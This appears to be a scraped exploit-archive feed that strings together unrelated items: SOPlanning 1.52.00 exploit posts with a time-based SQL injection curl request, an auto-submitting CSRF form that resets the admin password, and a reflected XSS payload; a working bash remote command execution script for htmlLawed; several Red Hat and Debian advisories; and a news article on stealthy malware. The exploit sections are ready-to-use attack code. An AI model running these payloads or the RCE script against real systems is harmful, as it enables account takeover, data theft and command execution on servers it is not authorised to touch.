SOPlanning version 1.52.00 suffers from a remote SQL injection vulnerability in projects.php.

    Exploit Title: SOPlanning v1.52.00 'projets.php' SQLiApplication: SOPlanningVersion: 1.52.00Date: 4/22/24Exploit Author: Joseph McPeters (Liquidsky)Vendor Homepage: https://www.soplanning.org/en/Software Link: https://sourceforge.net/projects/soplanning/Tested on: LinuxCVE: Not yet assignedDescription: SOPlanning v1.52.00 is vulnerable to Authenticated SQL Injection via the 'projects.php' page.Instructions: Authenticate to the host, the credentials can be obtained using a CSRF exploit (more info included). Once valid credentials are obtained use either a GET/POST request to send the valid parameters that equal to valid SQLi.Vulnerable request parameters for request to "/www/projets.php":filtreGroupeProjet=1&statut[]=todo'+AND+(SELECT+8073+FROM+(SELECT(SLEEP(10)))PuxA)+AND+'Liquidsky'='Liquidsky&rechercheProjet=testThe above parameters can be sent as either a valid GET/POST request to trigger the SQLi.Example Curl Request To Re-Test SQLi:curl -i -s -k -X $'POST' \    -H $'Host: 127.0.0.1' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 130' -H $'Origin: http://127.0.0.1<http://127.0.0.1/>' -H $'Connection: close' -H $'Referer: http://127.0.0.1/soplanning/www/projets.php' -H $'Upgrade-Insecure-Requests: 1' -H $'Sec-Fetch-Dest: document' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-User: ?1' \    -b $'dateDebut=23/04/2024; dateFin=23/06/2024; xposMoisWin=0; xposJoursWin=0; yposMoisWin=0; yposJoursWin=0; yposProjets=33; PHPSESSID=ovpbclvbc87uh7anfbq2luf9bi; soplanningplanning_=hhrtf0rgs562vm8rhn5i641481; baseLigne=users; baseColonne=jours; afficherTableauRecap=1; masquerLigneVide=0; statut_projet=%5B%22abort%22%2C%22archive%22%2C%22done%22%2C%22progress%22%2C%22todo%22%5D' \    --data-binary $'filtreGroupeProjet=1&statut[]=todo\'+AND+(SELECT+8073+FROM+(SELECT(SLEEP(10)))PuxA)+AND+\'Liquidsky\'=\'Liquidsky&rechercheProjet=test' \    $'http://127.0.0.1/soplanning/www/projets.php'  Note: Cookies need to be authenticated and request needs to be valid for valid SQLi. This curl request can be used with a proxy to reconstruct a valid request.

SOPlanning 1.52.00 SQL Injection

SOPlanning version 1.52.00 suffers from a cross site request forgery vulnerability in xajax_server.php.

<html>  <body>    <form action=https://fuzzlove.website/www/process/xajax_server.php method="POST">      <input type="hidden" name="xajax" value="submitFormProfil" />      <input type="hidden" name="xajaxr" value="" />      <input type="hidden" name="xajaxargs[]" value="ADM" />      <input type="hidden" name="xajaxargs[]" value=pwn@mail.lv<mailto:pwn@mail.lv> />      <input type="hidden" name="xajaxargs[]" value="password" />      <input type="hidden" name="xajaxargs[]" value="fr" />      <input type="hidden" name="xajaxargs[]" value="true" />      <input type="hidden" name="xajaxargs[]" value="false" />      <input type="hidden" name="xajaxargs[]" value="true" />      <input type="hidden" name="xajaxargs[]" value="true" />      <input type="hidden" name="xajaxargs[]" value="true" />      <input type="hidden" name="xajaxargs[]" value="false" />      <input type="hidden" name="xajaxargs[]" value="0" />      <input type="hidden" name="xajaxargs[]" value="1" />    </form>    <script>      document.forms[0].submit();    </script>  </body></html>

SOPlanning 1.52.00 Cross Site Request Forgery

SOPlanning version 1.52.00 suffers from a cross site scripting vulnerability in groupe_save.php.

Exploit Title: SOPlanning v1.52.00 'groupe_save.php' XSS (Reflected XSS)Application: SOPlanningVersion: 1.52.00Date: 4/22/24Exploit Author: Joseph McPeters (Liquidsky)Vendor Homepage: https://www.soplanning.org/en/Software Link: https://sourceforge.net/projects/soplanning/Tested on: LinuxCVE: Not yet assignedDescription: SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameters a remote unautheticated attacker can hijack the admin account or other users. The remote attacker can hijack a users session or credentials and perform a takeover of the entire platform.Example Payload:"><script>alert('LiQUiDSKY')</script><!--Reflected XSS: /soplanning/www/process/groupe_save.php?saved=1&groupe_id="><script>alert('LiQUiDSKY')</script><!--&nom=Project+NewAnalysis: The landing page takes into consideration the user input then redirects to a page where the XSS is shown the payload included in the exploit, escapes the variable where it is held, and comments out the rest to perform a valid reflected XSS attack against any authenticated user the payload was sent to.

SOPlanning 1.52.00 Cross Site Scripting

Red Hat Security Advisory 2024-2679-03 - An update for libxml2 is now available for Red Hat Enterprise Linux 9. Issues addressed include a use-after-free vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_2679.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: libxml2 security updateAdvisory ID:        RHSA-2024:2679-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:2679Issue date:         2024-05-02Revision:           03CVE Names:          CVE-2024-25062====================================================================Summary: An update for libxml2 is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The libxml2 library is a development toolbox providing the implementation of various XML standards.Security Fix(es):* libxml2: use-after-free in XMLReader (CVE-2024-25062)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-25062References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2262726

Red Hat Security Advisory 2024-2679-03

Red Hat Security Advisory 2024-2674-03 - An update for kernel is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_2674.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: kernel security and bug fix updateAdvisory ID:        RHSA-2024:2674-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:2674Issue date:         2024-05-02Revision:           03CVE Names:          CVE-2020-36516====================================================================Summary: An update for kernel is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The kernel packages contain the Linux kernel, the core of any Linux operating system.Security fixes:* kernel: mlxsw: spectrum_acl_tcam: Fix stack corruption (CVE-2024-26586)Solution:https://access.redhat.com/articles/11258CVEs:CVE-2020-36516References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2059928https://bugzilla.redhat.com/show_bug.cgi?id=2265645

Red Hat Security Advisory 2024-2674-03

Debian Linux Security Advisory 5676-1 - Security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5676-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonMay 02, 2024                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-4331 CVE-2024-4368Security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 124.0.6367.118-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmYzMtsACgkQZF0CR8NudjeJow//chgfC7BgVCbwFDpcCT7inL0/ikBr94LbLqd4cFyZaoZ+fDCktwWnw6NQJ3ua3mR6LoKZs+P8wsvR0nSXgYTPJPCK3Wn4yLK7t4tEZAgyjNIiJhKBtK4H3Y+sMitgBBxHgslK7nHjxd5gPk9We9qbYH5UihlmbVwHF3O2c2DYXQnloLPn5b7NbixuwosZna04+5T03h6jdRbaQuw9ZRM5uy4oqKccdrr9A78TZGL96c7MU1vGOUbkUJp7LMCnwXA0AJYi+NuB+CRE9q738t4JaY//2pLJw1fL8gney27yii8/J11UiVBfuRB9622gWNK3wS3ADIORQPBzt8TNWzy+DKg0W9ZbKmsxx0KvGqr8d04MeFDaM4KXH0CfNYSt89RzYxtMzlstTu/XkDj8CXNoTQIBrsDHft4/Ty6qs1s+ZWyv7VrF0sj99xdfDhrIGORUoeQdOe92jDaf9f8vRNDq4E9qPkLPyDbtx5ajDXY8jC/oVXx4lp8ZaLtF+GctGXQUM7jMPbRq5INP579R6aRv0uXW0niLsn9SYA4I1NbKgqAAGFibJI9LhYdHehggFCqzsqzrD9pjLaLflKGoenELAtgQdCRsu3uVFpEygpZJEqvm37ySDDCXIFEVGfBanWWaeQ3nbQI28+wKuA089kFznuq9ajHcjCeqMKEsj0/j1XI==pyNF-----END PGP SIGNATURE-----

Debian Security Advisory 5676-1

htmlLawed versions 1.2.5 and below proof of concept remote command execution exploit.

    #!/bin/bash# Exploit Title: htmlLawed <= 1.2.5 - Remote Code Execution# Date: 2024-05-02# Exploit Author: Miguel Redondo (aka d4t4s3c)# Vendor Homepage: https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed# Software Link: https://github.com/kesar/HTMLawed# Version: <= 1.2.5# Tested on: Linux# Category: Web Application# CVE: CVE-2022-35914while getopts ":u:c:" arg; do  case ${arg} in    u) url=${OPTARG}; let parameter_counter+=1 ;;    c) cmd=${OPTARG}; let parameter_counter+=1 ;;  esacdoneif [ -z "${url}" ] || [ -z "${cmd}" ]; then  echo -e "\n[*] htmlLawed <= 1.2.5 - Remote Code Execution"  echo -e "\n[-] Usage: CVE-2022-35914.sh -u <url> -c <cmd>\n"  exit 1else  echo -e "\n[*] htmlLawed <= 1.2.5 - Remote Code Execution"  echo -e "\n[+] Executing Command: ${cmd}\n"  cmd_output=$(curl -s -d "sid=foo&hhook=exec&text=${cmd}" -b "sid=foo" ${url} | egrep '\&nbsp; \[[0-9]+\] =\>' | sed -E 's/\&nbsp; \[[0-9]+\] =\> (.*)<br \/>/\1/')  echo -e "${cmd_output}\n"  exit 0fi

htmlLawed 1.2.5 Remote Command Execution

Red Hat Security Advisory 2024-2651-03 - An update for the nodejs:16 module is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_2651.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: nodejs:16 security updateAdvisory ID:        RHSA-2024:2651-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:2651Issue date:         2024-05-02Revision:           03CVE Names:          CVE-2024-22019====================================================================Summary: An update for the nodejs:16 module is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. Security Fix(es):* nodejs: reading unprocessed HTTP request with unbounded chunk extension allows DoS attacks (CVE-2024-22019)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-22019References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2264574

Red Hat Security Advisory 2024-2651-03

Red Hat Security Advisory 2024-2645-03 - An update for podman is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_2645.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: podman security updateAdvisory ID:        RHSA-2024:2645-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:2645Issue date:         2024-05-01Revision:           03CVE Names:          CVE-2024-1753====================================================================Summary: An update for podman is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact ofImportant. A Common Vulnerability Scoring System (CVSS) base score, which givesa detailed severity rating, is available for each vulnerability from the CVElink(s) in the References section.Description:The podman tool manages pods, container images, and containers. It is part of the libpod library, which is for applications that use container pods. Container pods is a concept in Kubernetes.Security Fix(es):* podman: full container escape at build time (CVE-2024-1753)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-1753References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2265513

Red Hat Security Advisory 2024-2645-03

A recent campaign targeting Middle Eastern government organizations plays standard detection tools like a fiddle. With cyberattackers getting more creative, defenders must start keeping pace.

Source: incamerastock via Alamy Stock Photo

If a recent wily cyber-espionage campaign against Middle Eastern government entities is any indication, cyber defenders will need to upgrade their malware detection capabilities soon.

Cybersecurity, the trope goes, is a cat-and-mouse game. Companies move to Linux and macOS, so attackers follow them there. Attackers deliver malware in phishing attachments, so Microsoft blocks Internet macros, so attackers adjust. As cybersecurity tooling grows stronger, attackers' methods for circumventing them grow more creative and effective.

So it was that in February, Kaspersky researchers discovered a threat actor spying on a Middle Eastern government organization. By the time Kaspersky reached the attack, at least 30 infections had already been recorded against other organizations, primarily around the Middle East. Despite that, the campaign — dubbed "DuneQuixote" — had managed to remain obscured for at least a year, thanks in large part to a combination of classic and novel stealth techniques.

As experts are quick to point out, cyberattackers across the board have been upgrading their stealth. Perhaps they're once again gaining the edge?

"It's absolutely trivial to create new malware that evades anti-malware detection," says David Brumley, cybersecurity professor at Carnegie Mellon and CEO of ForAllSecure. "Even 'advanced' behavioral analysis is pretty easy to fool with a few tricks. That means there is a huge volume of malware that would need manual analysis to really figure out what is happening. And of course, with all the custom tricks, that makes it really hard to do."

**DuneQuixote and Spanish Poetry**

The DuneQuixote campaign consists of two separate malware droppers and two separate payloads.

One dropper mimics the Total Commander software installer, packaging the legitimate software with its malicious contribution. Once inside a targeted machine, it runs through a series of anti-analysis checks, including, for example, whether any known security software is present on the device. Should any of its checks fail, the malware will return a value of "1," which has a coded meaning. When it comes time to decrypt the attackers' command-and-control (C2) server address, the 1 value will remove the "h" from "https," so that the C2 URL will begin with only "ttps," and no connection will be made at all.

The second DuneQuixote dropper is even more clever. When executed, its first act is to make a series of application programming interface (API) calls which at first appear to serve no actual purpose. Instead they contain strings with snippets from Spanish poems, which have a secret effect. Each instance of the dropper contains different lines of poetry, which earns each instance its own, unique signature. This makes things difficult for simple detection solutions, which rely on common signatures to identify new instances of known malware.

Like the first dropper, this second one also has a method for concealing its infrastructure from analysts. It takes the malicious file name plus a line from a Spanish poem, combines them, and runs them through the MD5 algorithm. The resulting hash acts as a key that decrypts the C2 address.

As for payloads: The two in this campaign are straightforward-enough backdoors that facilitate uploading and downloading files, executing commands, and modifying files. To avoid leaving a footprint, each is written directly into memory.

"Among emerging techniques, fileless malware \[is worrying\]," says Callie Guenther, senior manager of cyber-threat research at Critical Start. "This form of malware significantly reduces the digital footprint and evades traditional antivirus solutions that scan for file-based signatures, complicating post-breach analysis and forensics. It is particularly concerning due to its stealth and effectiveness, making it a likely candidate to become increasingly prevalent."

**How to Thwart Advanced Stealth Tactics**

Besides malware in-memory, "The most notable \[stealth tactics\] I've seen were tricks used in supply chain attacks, where malicious code blended with the legitimate code of comprehensive applications. Tough to identify," says Sergey Lozhkin, principal security researcher with Kaspersky's Global Research and Analysis Team.

As much as any individual tricks, threat actors have mastered how to adapt to their targeted environments — staggering at which points they drop their various tools, under what conditions, and to what ends. "At the highest level, you can't analyze what you don't have. Malware authors use this idea and incrementally download new components, perhaps only when given a specific command by the author. Until those components are downloaded, we don't know what they do," Brumley says.

"Beyond that," he adds, "the problem isn't one single anti-analysis technique; it's the sheer number and ability to mix and match them. They may embed 'weird machines,' where the malware has a custom language interpreter and the malware logic runs on top of it. This is hard to analyze because when you try to analyze it, you see the weird machine, not the malware logic itself. Malware authors may encrypt and pack components of the malware, and only incrementally decrypt them. And some parts of the malware may be encrypted with a key that isn't in the malware itself, but is part of the C2 command. Or they could mix all of the above."

To combat all of the stealth tactics and techniques at attackers' disposal, Guenther and Lozhkin recommend layered security: endpoint detection and response (EDR), behavioral analytics and anomaly detection technologies, and a broader zero-trust approach to system access.

For his part, Brumley is less optimistic. "Throughout the ages people have proposed whitelist-only. This means locking down machines hard, and then making sure they only install approved apps (or apps from approved vendors that are signed). Apple is the most famous for taking this approach, at least on mobile, with their walled garden approach," he says.

"Beyond that, this is a place where the attacker just has an asymmetric advantage," Brumley adds. "That's why most effort isn't put on malware analysis, but good hygiene to try and limit what gets installed."

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Tag

#linux